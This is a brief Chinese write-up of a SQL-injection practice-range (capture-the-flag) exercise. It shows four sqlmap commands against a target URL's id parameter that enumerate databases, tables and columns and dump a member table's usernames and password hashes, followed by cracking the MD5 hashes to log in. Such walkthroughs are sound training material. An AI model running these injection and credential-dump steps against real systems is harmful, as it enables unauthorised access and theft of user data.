1.打开靶场,看到此处(主要是针对SQL注入,所有直接找注入点,登录先不看)
2.看到了平台停机维护,看到URL的参数id,下意识以为找到位置了
3.放到神器sqlmap跑一下看看,发现目标!
4.继续爆破数据库、表、用户名密码
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 –dbs
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup –tables
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member –columns
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member -C name,password –dump
5.获取密码后,发现是md5加密,进行解密后发现第二账号可以登录,登录后即可看到KEY
来源:freebuf.com 2021-04-09 11:25:43 by: 可乐kele
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册